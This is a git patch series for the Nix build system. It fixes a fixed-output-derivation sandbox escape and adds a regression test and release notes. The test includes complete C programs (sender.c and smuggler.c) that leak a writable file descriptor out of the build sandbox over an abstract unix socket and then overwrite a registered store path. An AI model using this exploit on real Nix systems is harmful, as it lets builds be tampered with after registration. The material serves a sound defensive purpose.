From 4645652975ffdfc2f621c8387ed380be91539a1a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <theophane.hufschmitt@tweag.io>
Date: Mon, 12 Feb 2024 21:28:20 +0100
Subject: [PATCH 1/3] Add a NixOS test for the sandbox escape

Test that we can't leverage abstract unix domain sockets to leak file
descriptors out of the sandbox and modify the path after it has been
registered.
---
 tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++
 tests/nixos/ca-fd-leak/sender.c    | 65 +++++++++++++++++++++
 tests/nixos/ca-fd-leak/smuggler.c  | 66 ++++++++++++++++++++++
 tests/nixos/default.nix            |  4 +-
 4 files changed, 224 insertions(+), 1 deletion(-)
 create mode 100644 tests/nixos/ca-fd-leak/default.nix
 create mode 100644 tests/nixos/ca-fd-leak/sender.c
 create mode 100644 tests/nixos/ca-fd-leak/smuggler.c

diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
new file mode 100644
index 00000000000..a6ae72adc93
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -0,0 +1,90 @@
+# Nix is a sandboxed build system. But Not everything can be handled inside its
+# sandbox: Network access is normally blocked off, but to download sources, a
+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
+# The detail here is not important, but in our case it means that the hash of
+# the output has to be known beforehand. And if you know that, you get a few
+# rights: you no longer run inside a special network namespace!
+#
+# Now, Linux has a special feature, that not many other unices do: Abstract
+# unix domain sockets! Not only that, but those are namespaced using the
+# network namespace! That means that we have a way to create sockets that are
+# available in every single fixed-output derivation, and also all processes
+# running on the host machine! Now, this wouldn't be that much of an issue, as,
+# well, the whole idea is that the output is pure, and all processes in the
+# sandbox are killed before finalizing the output. What if we didn't need those
+# processes at all? Unix domain sockets have a semi-known trick: you can pass
+# file descriptors around!
+# This makes it possible to exfiltrate a file-descriptor with write access to
+# $out outside of the sandbox. And that file-descriptor can be used to modify
+# the contents of the store path after it has been registered.
+
+{ config, ... }:
+
+let
+  pkgs = config.nodes.machine.nixpkgs.pkgs;
+
+  # Simple C program that sends a a file descriptor to `$out` to a Unix
+  # domain socket.
+  # Compiled statically so that we can easily send it to the VM and use it
+  # inside the build sandbox.
+  sender = pkgs.runCommandWith {
+    name = "sender";
+    stdenv = pkgs.pkgsStatic.stdenv;
+  } ''
+    $CC -static -o $out ${./sender.c}
+  '';
+
+  # Okay, so we have a file descriptor shipped out of the FOD now. But the
+  # Nix store is read-only, right? .. Well, yeah. But this file descriptor
+  # lives in a mount namespace where it is not! So even when this file exists
+  # in the actual Nix store, we're capable of just modifying its contents...
+  smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
+
+  # The abstract socket path used to exfiltrate the file descriptor
+  socketName = "FODSandboxExfiltrationSocket";
+in
+{
+  name = "ca-fd-leak";
+
+  nodes.machine =
+    { config, lib, pkgs, ... }:
+    { virtualisation.writableStore = true;
+      nix.settings.substituters = lib.mkForce [ ];
+      virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
+    };
+
+  testScript = { nodes }: ''
+    start_all()
+
+    machine.succeed("echo hello")
+    # Start the smuggler server
+    machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
+
+    # Build the smuggled derivation.
+    # This will connect to the smuggler server and send it the file descriptor
+    machine.succeed(r"""
+      nix-build -E '
+        builtins.derivation {
+          name = "smuggled";
+          system = builtins.currentSystem;
+          # look ma, no tricks!
+          outputHashMode = "flat";
+          outputHashAlgo = "sha256";
+          outputHash = builtins.hashString "sha256" "hello, world\n";
+          builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+          args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
+      }'
+    """.strip())
+
+
+    # Tell the smuggler server that we're done
+    machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+
+    # Check that the file was not modified
+    machine.succeed(r"""
+      cat ./result
+      test "$(cat ./result)" = "hello, world"
+    """.strip())
+  '';
+
+}
diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
new file mode 100644
index 00000000000..75e54fc8f52
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/sender.c
@@ -0,0 +1,65 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <string.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+    assert(argc == 2);
+
+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+    // Set up a abstract domain socket path to connect to.
+    struct sockaddr_un data;
+    data.sun_family = AF_UNIX;
+    data.sun_path[0] = 0;
+    strcpy(data.sun_path + 1, argv[1]);
+
+    // Now try to connect, To ensure we work no matter what order we are
+    // executed in, just busyloop here.
+    int res = -1;
+    while (res < 0) {
+        res = connect(sock, (const struct sockaddr *)&data,
+            offsetof(struct sockaddr_un, sun_path)
+              + strlen(argv[1])
+              + 1);
+        if (res < 0 && errno != ECONNREFUSED) perror("connect");
+        if (errno != ECONNREFUSED) break;
+    }
+
+    // Write our message header.
+    struct msghdr msg = {0};
+    msg.msg_control = malloc(128);
+    msg.msg_controllen = 128;
+
+    // Write an SCM_RIGHTS message containing the output path.
+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+    hdr->cmsg_len = CMSG_LEN(sizeof(int));
+    hdr->cmsg_level = SOL_SOCKET;
+    hdr->cmsg_type = SCM_RIGHTS;
+    int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
+    memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
+
+    msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+    // Write a single null byte too.
+    msg.msg_iov = malloc(sizeof(struct iovec));
+    msg.msg_iov[0].iov_base = "";
+    msg.msg_iov[0].iov_len = 1;
+    msg.msg_iovlen = 1;
+
+    // Send it to the othher side of this connection.
+    res = sendmsg(sock, &msg, 0);
+    if (res < 0) perror("sendmsg");
+    int buf;
+
+    // Wait for the server to close the socket, implying that it has
+    // received the commmand.
+    recv(sock, (void *)&buf, sizeof(int), 0);
+}
diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
new file mode 100644
index 00000000000..82acf37e68e
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/smuggler.c
@@ -0,0 +1,66 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+    assert(argc == 2);
+
+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+    // Bind to the socket.
+    struct sockaddr_un data;
+    data.sun_family = AF_UNIX;
+    data.sun_path[0] = 0;
+    strcpy(data.sun_path + 1, argv[1]);
+    int res = bind(sock, (const struct sockaddr *)&data,
+        offsetof(struct sockaddr_un, sun_path)
+        + strlen(argv[1])
+        + 1);
+    if (res < 0) perror("bind");
+
+    res = listen(sock, 1);
+    if (res < 0) perror("listen");
+
+    int smuggling_fd = -1;
+
+    // Accept the connection a first time to receive the file descriptor.
+    fprintf(stderr, "%s\n", "Waiting for the first connection");
+    int a = accept(sock, 0, 0);
+    if (a < 0) perror("accept");
+
+    struct msghdr msg = {0};
+    msg.msg_control = malloc(128);
+    msg.msg_controllen = 128;
+
+    // Receive the file descriptor as sent by the smuggler.
+    recvmsg(a, &msg, 0);
+
+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+    while (hdr) {
+        if (hdr->cmsg_level == SOL_SOCKET
+          && hdr->cmsg_type == SCM_RIGHTS) {
+
+            // Grab the copy of the file descriptor.
+            memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
+        }
+
+        hdr = CMSG_NXTHDR(&msg, hdr);
+    }
+    fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
+    close(a);
+
+    // Wait for a second connection, which will tell us that the build is
+    // done
+    a = accept(sock, 0, 0);
+    fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
+    // Write a new content to the file
+    if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
+    char * new_content = "Pwned\n";
+    int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
+    if (written_bytes != strlen(new_content)) perror("write");
+}
diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix
index 8f4fa262150..98de31e1371 100644
--- a/tests/nixos/default.nix
+++ b/tests/nixos/default.nix
@@ -109,7 +109,7 @@ in
       nix.package = lib.mkForce pkgs.nixVersions.nix_2_13;
     };
   };
-  
+
   # TODO: (nixpkgs update) remoteBuildsSshNg_remote_2_18 = ...
 
   # Test our Nix as a builder for clients that are older
@@ -156,4 +156,6 @@ in
     (system: runNixOSTestFor system ./setuid.nix);
 
   fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git;
+
+  ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak;
 }

From 244f3eee0bbc7f11e9b383a15ed7368e2c4becc9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <theophane.hufschmitt@tweag.io>
Date: Tue, 13 Feb 2024 08:28:02 +0100
Subject: [PATCH 2/3] Copy the output of fixed-output derivations before
 registering them

It is possible to exfiltrate a file descriptor out of the build sandbox
of FODs, and use it to modify the store path after it has been
registered.
To avoid that issue, don't register the output of the build, but a copy
of it (that will be free of any leaked file descriptor).
---
 src/libstore/build/local-derivation-goal.cc | 6 ++++++
 src/libutil/file-system.cc                  | 5 +++++
 src/libutil/file-system.hh                  | 7 +++++++
 3 files changed, 18 insertions(+)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index 2ba8be7d6cf..813da63e4ec 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2527,6 +2527,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
             [&](const DerivationOutput::CAFixed & dof) {
                 auto & wanted = dof.ca.hash;
 
+                // Replace the output by a fresh copy of itself to make sure
+                // that there's no stale file descriptor pointing to it
+                Path tmpOutput = actualPath + ".tmp";
+                copyFile(actualPath, tmpOutput, true);
+                renameFile(tmpOutput, actualPath);
+
                 auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
                     .method = dof.ca.method,
                     .hashAlgo = wanted.algo,
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index cf8a6d967e8..0b3b0f7908a 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -628,6 +628,11 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete)
     }
 }
 
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete)
+{
+    return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete);
+}
+
 void renameFile(const Path & oldName, const Path & newName)
 {
     fs::rename(oldName, newName);
diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh
index 464efc242fe..963265e3412 100644
--- a/src/libutil/file-system.hh
+++ b/src/libutil/file-system.hh
@@ -186,6 +186,13 @@ void renameFile(const Path & src, const Path & dst);
  */
 void moveFile(const Path & src, const Path & dst);
 
+/**
+ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is
+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but
+ * with the guaranty that the destination will be “fresh”, with no stale inode
+ * or file descriptor pointing to it).
+ */
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete);
 
 /**
  * Automatic cleanup of resources.

From d6918898c9fbab9c6ad09d25e612674d62458729 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <theophane.hufschmitt@tweag.io>
Date: Fri, 1 Mar 2024 09:31:05 +0100
Subject: [PATCH 3/3] Add release notes

---
 doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md

diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
new file mode 100644
index 00000000000..ed451711e4b
--- /dev/null
+++ b/doc/manual/rl-next/fod-sandbox-escape.md
@@ -0,0 +1,14 @@
+---
+synopsis: Fix a FOD sandbox escape
+issues:
+prs:
+---
+
+Cooperating Nix derivations could send file descriptors to files in the Nix
+store to each other via Unix domain sockets in the abstract namespace. This
+allowed one derivation to modify the output of the other derivation, after Nix
+has registered the path as "valid" and immutable in the Nix database.
+In particular, this allowed the output of fixed-output derivations to be
+modified from their expected content.
+
+This isn't the case any more.